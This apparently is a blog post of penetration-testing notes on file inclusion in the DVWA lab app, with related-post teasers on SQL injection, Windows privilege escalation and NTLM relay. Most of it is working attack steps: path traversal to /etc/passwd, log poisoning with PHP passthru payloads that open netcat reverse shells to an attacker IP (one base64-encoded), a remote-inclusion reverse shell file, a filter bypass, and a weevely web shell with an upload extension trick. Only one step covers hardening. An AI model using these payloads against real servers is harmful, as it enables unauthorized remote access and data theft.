Skip to main content

File Inclusion

By
File Inclusion

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd  --> to get passwords s

-------------------------------------------------------------------------------------------------------
     WEB TERMINAL ACCESS USING FILE INCLUSION      ==========================                                    using environmental variables
---------------------------------------------------------------------------------------------------------

cat /proc/self/environ --> to see environment variables

Opening Environment variables in the target machine
 --> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ

Now Intercept the request using brup suite -
change the browser name log to a php code in the burp suite in header <?phpinfo()?>

type in command prompt
 --> nc -vv -l -p 8888
type in burp suite header (request)
 --> <?passthru("nc -e /bin/sh attacker_ip 8888"); ?>   // <?passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>



-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ============================================using logs --> var/log/auth.log
  --> var/log/apache2/access.log
---------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> var/log/auth.log shows the authenticated logs

--> lets try to login using "ssh" into the server and check the logs

ssh random@192.168.149.136
random
--> a log is logged


ssh "<?passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP

need to convert the command into base64 --> nc -e /bin/sh attacker_ip 8888
--> open burpsuite and go to decoder paste: nc -e /bin/sh attacker_ip 8888
--> copy the encoded code and paste in the bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4


ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP


 -->type in command prompt
nc -vv -l -p 8888


--> now open this

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log

--> In Cmd type
 id
 ls
 pwd


===========================================================================================================
- Remote File Inclusion - Low Security -----------------------------
===========================================================================================================

It is a special case of file inclusion vulnerabilities. if a server configured to allow a certain function caleed allow
url, allow_url fopen. we will be able to include to any file from any computer to the target computer. can upload any
php file. we can run payloads, reverse shells and system commands as well.


In dvwa, remote file inclusion is turned off, we need to turn it on

sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "On"
ctrl +x
yes
sudo /etc/init.d/apache2 restart


file should be stored on a real server with an ip which should be remotely accessible


<?php

passthru("nc -e /bin/sh 192.168.149.128 8080");


?>

save it as reverse.txt file in /var/www/html

open it as http://localhost/reverse.txt   --> should be accessible remote if u want to hack a real server

in cmd type
--> nc -vv -l -p 8080

run this now ...

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?

whoami
uname -a
ls
pwd


==========================================================================================================
-------------------------- Remote File Inclusion - MediumSecurity -------------
===========================================================================================================
 nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?





securing from Remote file inclusion:


sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "Off"
    allow_url_include = Off
ctrl +x
yes
sudo /etc/init.d/apache2 restart v






File upload vulnerability:
--------------------------
Generate a web payload and gain remote connection or access:
--> weevely generate 12345 /root/Desktop/shell.php   // 123456 is the password
To run it
--> weevely link_of_shell password
change the extension of the file from php to jpg

modify requests using burpsite while uploading file, change the extension of the file from jpg to php

Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more